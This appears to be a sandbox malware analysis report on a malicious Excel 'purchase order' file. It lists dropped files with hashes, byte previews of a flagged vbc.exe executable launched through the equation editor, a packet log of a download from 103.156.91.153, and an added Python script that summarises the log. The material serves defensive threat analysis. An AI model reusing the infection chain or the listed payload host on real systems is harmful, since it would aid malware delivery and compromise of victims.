                                        Preview:j..QQ6.}.}.034..aQ.4.....4....i..YQD.m.QQQ..UQl.l...Y.ihQQQ...6Ml.l...Y.icQQQ..A.6.l.l...Y.iBQQQ..I.6]l.l...Y.i-QQQ....6E.....9.....z...6e...i..J..i..}..i..m.......:Tb..i.6m..?..m43..U.ea..iQQQQ....X..ml.:l.A.l.I.9l...:l..l.i..S.....T....U..{R.al.........a..miQQQQD...QQQ....X..U....a...J?.Q6.}..4....Y...Q.......Q..........6Y..m...Q....R..Y.6mJ?.Q..gC.i..QQi..QQ?.Q..lL.i1.QQi3.QQ?.Q....i..QQi..QQ?.Q6.}.}..4....iD.Y.QQQ....m..YQ....mCQQ..m...m..Y...Yxei.QQ......z..:.JQ....5.M..iz..:..Q....5.M....9..Q......lL.iXRQQ.i.nll..Ux...i.l.i.lll..U..UQ...aQx.D.aRQQQ..aJ?.Q6.}.}..4....iD.Y.QQQ.....m..YQ....mCQQ..m...m..Y...Yxeiz.QQ.....QQQ..z..:.JQ....5.E..z..:..Q....5.E..z..:B.....5.E....J.............E..iz..:.......5.E....9..Q......gC.i_QQQ.ijmll..U...Q...i....Rx.l..l..l.l.l.i.kll..U..UQ...aQx.D.aRQQQ..aJ?.Q6.}.}.D.Y.QQQ..e..m..YQ....mCQQ..m...m..Y...Yxei..QQ......z..:.JQ..e.5.i..z..:..Q..e.5.i....9..Q..e.....i.QQQ.i.mll..Ux.l.l.i.nl
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):274451
                                        Entropy (8bit):7.534851581609414
                                        Encrypted:false
                                        SSDEEP:3072:ldMe5ejQJleaiQ9c4aFvhp5Vg7AAuydCXpXqvFJCkOVyj4Fyjda5CwD1/ui58W:ceJFShpjupdCZqvLVO+WCkx
                                        MD5:384A5748B417139E08ACEEDD769BCF46
                                        SHA1:EBC2F56F76E58CE024678D56C3D06ECE94832C6C
                                        SHA-256:8B49AAEA3CE6F914D1E2C7B48902B9E3D44BAC9013A8FE6826000FB6E48654AC
                                        SHA-512:43798CFE7F8C28DA3DA98D7E51B3A4D60DCB5EE4F90086A1684B182478D6F7F9A0D0DA554ED1094B5EFB429A434FCFC58BAD115AEC53FDD67FEEE37E8B8177AA
                                        Malicious:false
                                        Preview::5......,...................m....%......p4......:5..........................................................................................................................................................................................................................................G...............9...j...............................................................................................................................K...........#...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):175615
                                        Entropy (8bit):7.99037693756646
                                        Encrypted:true
                                        SSDEEP:3072:tdMe5ejQJleaiQ9c4aFvhp5Vg7AAuydCXpXqvFJCkOVyj4FyX:EeJFShpjupdCZqvLVO+X
                                        MD5:E5D98C0DED859D8A94EFF3DE479F7EC5
                                        SHA1:86ACE17C40569BA09C5AA4792969F9709E398A56
                                        SHA-256:9A974A3EF1A34282E6502D2BF42E6A8011BD42D126875CE15DEC0F9A8B030E43
                                        SHA-512:4770FDFA2899C6FD56FA8A39E7ABF45B9A9B42EF1F8193F8E7F310E1B219A098EF938A34B5C73D6403C942BC70CEC87DF1049E4DA715E6740041956050887E88
                                        Malicious:false
                                        Preview:T....-.......H....H.e.7..trc......i..R3xa.-T..<.Z%..@.../`C.}...i.DnqO.....>n.......%C{..S.~........._.X...Nm..R.Kh.....^l.][....].....i..8.V..=......<.DZ2.il..|..N..z.....bZ..6...j...,Z_..s...........Z...Mv.......X....w..(.d.........Q=#..........-..x....L.D........O...rc.....&.i..R3.a.-T..<.Z%..@.X../. .s.1.E4w...Qy.m.8..+.C..a.k.....;.Q..j...xL`...=...Kh.....].l...+.|ikh.. .C.*..0Q..{.>|.B..|..$.w.~{.......TaJ....#............Z_..s...?.0f...P/..Mv....Y..X...w..(.d.........=4....j.:....-..Y..\.L.D.....C....Jrc......i..R3xa.-T..<.Z%..@.X../. .s.1.E4w...Qy.m.8..+.C..a.k.....;.Q..j...xL`...=...Kh.....].l...+.|ikh.. .C.*..0Q..{.>|.B..|..$.w.~{.......z..... U...........,Z_..s...?.0f....P...Mv....Y..X...w..(.d.........=4....j.:....-..Y..\.L.D.....C....Jrc......i..R3xa.-T..<.Z%..@.X../. .s.1.E4w...Qy.m.8..+.C..a.k.....;.Q..j...xL`...=...Kh.....].l...+.|ikh.. .C.*..0Q..{.>|.B..|..$.w.~{.......z..... U...........,Z_..s...?.0f....P...Mv....Y..X...
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:CDFV2 Encrypted
                                        Category:dropped
                                        Size (bytes):95744
                                        Entropy (8bit):7.924269341639024
                                        Encrypted:false
                                        SSDEEP:1536:ZXCgcfyN02EkOn1m8GFY9MgSlAzLVLQPxr3g1SBKhD9Z26u:ZXSi02EkYHGOMPlUCPxLbopZ
                                        MD5:981661FB35D158853F012F21AADD7B92
                                        SHA1:2CE93CBF7651C472A598B8756F5301275D95E27F
                                        SHA-256:3084B6D063C6EC61503E90E6F2C61830EC915593FED9DDC719F67BC1EC24B49A
                                        SHA-512:E676218BBDC01687242E9E7695F838CD33E84E57E4E844ADBD307421315A3E5AC56267704685EF1A4E99C36EA1A6D1368433FEA736AA5E981265A5CF6BCE03B5
                                        Malicious:false
                                        Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):165
                                        Entropy (8bit):1.4377382811115937
                                        Encrypted:false
                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                        Malicious:true
                                        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):263783
                                        Entropy (8bit):7.9127214183326275
                                        Encrypted:false
                                        SSDEEP:3072:LODZGPEounb6dFqeTHg1WG3Tpf8o7j8kRSLCXD35Zq66TvNJsd19vQ1/A3wCEGj7:LOtIO6RsBTpfD7lRVq6uJM194uLiC87i
                                        MD5:5AF1C7DD89A535DEE51C3E28B4A74F8D
                                        SHA1:A4BEACE30EF4B975E247AFBAF837E757A5372F7E
                                        SHA-256:039EF59E7502A98D0B9A6A7E7818444F6DBD699A4CDB10A8DBA031222CFDDE6F
                                        SHA-512:28C4CAC036B93D8943D42613DC8C703A66D291393760524C22E0FCD76E7B67CE73E40704C29321E42765364638F0EE3C11AF52922700570BA47AB661B846A7F7
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................
                                        File type:CDFV2 Encrypted
                                        Entropy (8bit):7.924269341639024
                                        TrID:
                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                        File name:BON DE COMMANDE POUR CHENOUFI AEK.xlsx
                                        File size:95744
                                        MD5:981661fb35d158853f012f21aadd7b92
                                        SHA1:2ce93cbf7651c472a598b8756f5301275d95e27f
                                        SHA256:3084b6d063c6ec61503e90e6f2c61830ec915593fed9ddc719f67bc1ec24b49a
                                        SHA512:e676218bbdc01687242e9e7695f838cd33e84e57e4e844adbd307421315a3e5ac56267704685ef1a4e99c36ea1a6d1368433fea736aa5e981265a5cf6bce03b5
                                        SSDEEP:1536:ZXCgcfyN02EkOn1m8GFY9MgSlAzLVLQPxr3g1SBKhD9Z26u:ZXSi02EkYHGOMPlUCPxLbopZ
                                        TLSH:4793014833DE4E98E5A30379DDA4DCA7ABC46D2A9E3321D3358131ADF2B05109EA547F
                                        File Content Preview:........................>......................................................................................................................................................................................................................................
                                        Icon Hash:e4e2aa8aa4b4bcb4
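The connection log that follows lists one row per packet between the analysis host 192.168.2.22 and 103.156.91.153 on port 80, the connection the signatures attribute to the equation editor process. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses such rows into one flow record per conversation (initiator, responder, packets each way, duration), the shape in which an analyst would compare the sandbox observation with NetFlow or proxy records from a real network. It assumes the five columns are separated by two or more spaces; the embedded sample rows are the first ten rows of the log below, laid out that way, and the nine-digit fractional seconds are kept as integer nanoseconds because `datetime` only carries microseconds.

```python
"""Turn a sandbox connection log into per-conversation flow records."""
import re
from datetime import datetime
from typing import Dict, List, NamedTuple, Tuple

# Constructed sample (assumption): the first ten rows of the connection log,
# with the five columns separated by two or more spaces.
SAMPLE_LOG = """\
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
May 13, 2022 17:07:41.349982977 CEST  49171        80         192.168.2.22    103.156.91.153
May 13, 2022 17:07:41.565598011 CEST  80           49171      103.156.91.153  192.168.2.22
May 13, 2022 17:07:41.565769911 CEST  49171        80         192.168.2.22    103.156.91.153
May 13, 2022 17:07:41.567938089 CEST  49171        80         192.168.2.22    103.156.91.153
May 13, 2022 17:07:41.784928083 CEST  80           49171      103.156.91.153  192.168.2.22
May 13, 2022 17:07:41.784980059 CEST  80           49171      103.156.91.153  192.168.2.22
May 13, 2022 17:07:41.785007954 CEST  80           49171      103.156.91.153  192.168.2.22
May 13, 2022 17:07:41.785031080 CEST  80           49171      103.156.91.153  192.168.2.22
May 13, 2022 17:07:41.785044909 CEST  49171        80         192.168.2.22    103.156.91.153
May 13, 2022 17:07:41.785075903 CEST  49171        80         192.168.2.22    103.156.91.153
"""

Endpoint = Tuple[str, int]            # (ip, port)
FlowKey = Tuple[Endpoint, Endpoint]   # (initiator, responder)


class Packet(NamedTuple):
    ts_ns: int        # nanoseconds since the Unix epoch; the zone name is ignored
    src: Endpoint
    dst: Endpoint


class Flow(NamedTuple):
    initiator: Endpoint
    responder: Endpoint
    sent: int         # packets initiator -> responder
    received: int     # packets responder -> initiator
    first_ns: int
    last_ns: int

    @property
    def duration_ms(self) -> float:
        return (self.last_ns - self.first_ns) / 1e6


_EPOCH = datetime(1970, 1, 1)
_TS_RE = re.compile(r"(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d{1,9}) \w+")


def parse_timestamp(text: str) -> int:
    """'May 13, 2022 17:07:41.349982977 CEST' -> integer nanoseconds.
    datetime only carries microseconds, so the nine-digit fraction is parsed apart."""
    m = _TS_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    whole = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    frac_ns = int(m.group(2).ljust(9, "0"))
    return int((whole - _EPOCH).total_seconds()) * 10**9 + frac_ns


def parse_log(text: str) -> List[Packet]:
    """Parse the five-column log; the header line and blank lines are skipped."""
    packets: List[Packet] = []
    for line in text.splitlines():
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) != 5 or cols[0] == "Timestamp":
            continue
        ts, sport, dport, sip, dip = cols
        packets.append(Packet(parse_timestamp(ts), (sip, int(sport)), (dip, int(dport))))
    return packets


def summarize_flows(packets: List[Packet]) -> Dict[FlowKey, Flow]:
    """Pair both directions of each conversation. Whoever sends the first packet
    seen is treated as the initiator, i.e. the client side of the connection."""
    flows: Dict[FlowKey, Flow] = {}
    for p in sorted(packets, key=lambda pkt: pkt.ts_ns):
        if (p.src, p.dst) in flows:
            key, outbound = (p.src, p.dst), True
        elif (p.dst, p.src) in flows:
            key, outbound = (p.dst, p.src), False
        else:
            key, outbound = (p.src, p.dst), True
            flows[key] = Flow(p.src, p.dst, 0, 0, p.ts_ns, p.ts_ns)
        f = flows[key]
        flows[key] = f._replace(sent=f.sent + int(outbound),
                                received=f.received + int(not outbound),
                                last_ns=max(f.last_ns, p.ts_ns))
    return flows


def flow_lines(flows: Dict[FlowKey, Flow]) -> List[str]:
    """One summary line per conversation, ready to diff against flow or proxy logs."""
    return [f"{f.initiator[0]}:{f.initiator[1]} -> {f.responder[0]}:{f.responder[1]}  "
            f"sent={f.sent} recv={f.received} duration={f.duration_ms:.3f} ms"
            for f in flows.values()]


if __name__ == "__main__":
    for line in flow_lines(summarize_flows(parse_log(SAMPLE_LOG))):
        print(line)
```

On the ten sample rows this yields a single conversation initiated by 192.168.2.22:49171 towards 103.156.91.153:80 with five packets in each direction over about 435 ms; running it over the full log gives the packet counts and duration that a firewall or proxy record of the same download should match.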
                                        Timestamp                             Source Port  Dest Port  Source IP       Dest IP
                                        May 13, 2022 17:07:41.349982977 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:41.565598011 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:41.565769911 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:41.567938089 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:41.784928083 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:41.784980059 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:41.785007954 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:41.785031080 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:41.785044909 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:41.785075903 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:41.785079956 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.000262022 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.000288963 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.000305891 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.000319004 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.000335932 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.000353098 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.000370979 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.000386953 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.000448942 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.000498056 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.215287924 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.215338945 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.215358973 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.215373993 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.215385914 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.215403080 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.215420008 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.215435982 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.215451956 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.215468884 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.215485096 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.215501070 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.215517044 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.215533972 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.215549946 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.215558052 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.215567112 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.215593100 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.215598106 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.215600967 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.215604067 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.219461918 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430604935 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430644035 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430661917 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430680990 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430690050 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430697918 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430716991 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430726051 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430730104 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430736065 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430746078 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430753946 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430757046 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430771112 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430774927 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430788994 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430792093 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430807114 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430826902 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430844069 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430849075 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430862904 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430865049 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430881023 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430885077 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430898905 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430902004 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430917978 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430918932 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430934906 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430939913 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430953979 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430955887 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430972099 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430974960 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.430989981 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.430998087 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.431008101 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.431016922 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.431026936 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.431045055 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.431055069 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.431060076 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.431062937 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.431078911 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.431081057 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.431082964 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.431099892 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.431107044 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.431118011 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.431123018 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.431133986 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.431138992 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.431154966 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.431169033 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.435108900 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.645956993 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.645997047 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.646015882 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.646034956 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.646050930 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.646066904 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.646084070 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.646102905 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.646120071 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.646136999 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.646137953 CEST  49171        80         192.168.2.22    103.156.91.153
                                        May 13, 2022 17:07:42.646155119 CEST  80           49171      103.156.91.153  192.168.2.22
                                        May 13, 2022 17:07:42.646163940 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646166086 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646173000 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646181107 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646199942 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646199942 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646217108 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646220922 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646235943 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646235943 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646251917 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646255016 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646269083 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646270037 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646284103 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646286011 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646302938 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646303892 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646317959 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646322012 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646337032 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646338940 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646352053 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646354914 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646367073 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646372080 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646385908 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646389008 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646401882 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646405935 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646418095 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646421909 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646435976 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646439075 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646456957 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646456957 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646471024 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646486998 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.649616957 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650238037 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650263071 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650280952 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650296926 CEST8049171103.156.91.153192.168.2.22
